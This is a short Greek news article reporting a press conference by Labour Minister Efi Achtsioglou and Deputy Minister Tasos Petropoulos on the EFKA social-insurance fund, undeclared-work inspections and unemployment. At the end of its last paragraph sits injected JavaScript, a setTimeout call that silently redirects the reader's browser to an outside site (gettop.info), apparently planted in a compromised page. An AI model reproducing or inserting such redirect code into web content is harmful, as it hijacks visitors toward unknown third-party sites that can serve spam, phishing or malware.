Αχτσιόγλου-Πετρόπουλος: Ο ΕΦΚΑ είναι η κοινωνική αλληλεγύη που χρειάζεται η χώρα

0
10

 

Συνέντευξη Τύπου όπου παρουσίασαν το πλαίσιο που θα κινηθεί το υπουργείο Εργασίας, έδωσε η υπουργός Έφη Αχτσιόγλου και ο υφυπουργός Τάσος Πετρόπουλος.

Υπογράμμισε πως πραγματοποιούνται ήδη και θα ενταθούν στοχευμένοι και αποτελεσματικοί έλεγχοι για την αδήλωτη εργασία ώστε να μην χάνονται πλέον σημαντικοί πόροι από την κοινωνική ασφάλιση.

Η Έφη Αχτσιόγλου τόνισε ότι η ανεργία και η καταπολέμησή της είναι ένα πολύ σημαντικό ζήτημα. «Δεν εφησυχάζουμε με τη μικρή μείωση της αλλά σήμερα καταγράφουμε το καλύτερο ισοζύγιο προσλήψεων απολύσεων» είπε μεταξύ άλλων.

Ο ΕΦΚΑ είναι η κοινωνική αλληλεγγύη που χρειάζεται η χώρα μας τόνισε από την πλευρά του ο υφυπουργός Κοινωνικής Ασφάλισης Τάσος Πετρόπουλος. Ο ΕΦΚΑ θα βρίσκεται παντού από τον νέο χρόνο τόνισε ο κ. Πετρόπουλος σημειώνοντας ότι η ηλεκτρονική αίτηση στον ΕΦΚΑ θα γίνεται από οπουδήποτε.

Όπως σημείωσε ο υφυπουργός Κοινωνικής Ασφάλισης μέσω της ιστοσελίδας του φορέα και μέσω του τετραψήφιου αριθμού 1155, οι ασφαλισμένοι μπορούν να ενημερωθούν. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here